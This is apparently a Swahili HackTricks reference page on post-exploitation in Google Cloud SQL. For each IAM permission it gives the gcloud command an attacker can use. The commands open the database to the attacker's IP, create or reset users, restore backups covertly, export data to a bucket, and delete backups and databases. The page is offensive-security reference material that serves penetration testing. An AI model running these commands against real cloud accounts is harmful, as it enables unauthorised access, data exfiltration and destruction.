GCP - Cloud SQL Post Exploitation

Jifunze uchimbaji wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za uchimbaji kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Cloud SQL

Kwa habari zaidi kuhusu Cloud SQL angalia:

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

Kuunganisha kwenye mabadiliko ya database unahitaji tu ufikiaji wa bandari ya database na kujua jina la mtumiaji na nywila, hakuna mahitaji ya IAM. Kwa hivyo, njia rahisi ya kupata ufikiaji, ikidhani kwamba database ina anwani ya IP ya umma, ni kusasisha mitandao iliyoruhusiwa na kuruhusu anwani yako ya IP kufikia.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

Pia niwezekana kutumia --no-backup kusababisha kuvuruga nakala rudufu za database.

Kwa kuwa hizi ni mahitaji sijui kabisa ni ruhusa gani cloudsql.instances.connect na cloudsql.instances.login zinahitajika. Ikiwa unajua, tuma PR!

`cloudsql.users.list`

Pata orodha ya watumiaji wote wa database:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

Haki hii inaruhusu kuunda mtumiaji mpya ndani ya database:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

Haki hii inaruhusu kubadilisha mtumiaji ndani ya database. Kwa mfano, unaweza kubadilisha nenosiri lake:

```bash gcloud sql users set-password --instance --password ``` ### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

Nakala za nakala rudufu zinaweza kuwa na habari nyeti za zamani, hivyo ni muhimu kuzichunguza. Rejesha nakala rudufu ndani ya database:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Ili kufanya hivyo kwa njia ya siri zaidi, inapendekezwa kuunda kipengee kipya cha SQL na kurejesha data hapo badala ya kwenye mabadiliko yanayoendelea ya sasa.

`cloudsql.backupRuns.delete`

Kibali hiki kuruhusu kufuta nakala rudufu:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

Fanya database kwa Kutumia Cloud Storage Bucket ili uweze kufikia kutoka hapo:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName>

`cloudsql.instances.import`, `storage.objects.get`

Ingiza (kuandika juu) database kutoka kwa Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

Futa database kutoka kwa kifaa cha db:

gcloud sql databases delete <db-name> --instance <instance-id>

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 2 months ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete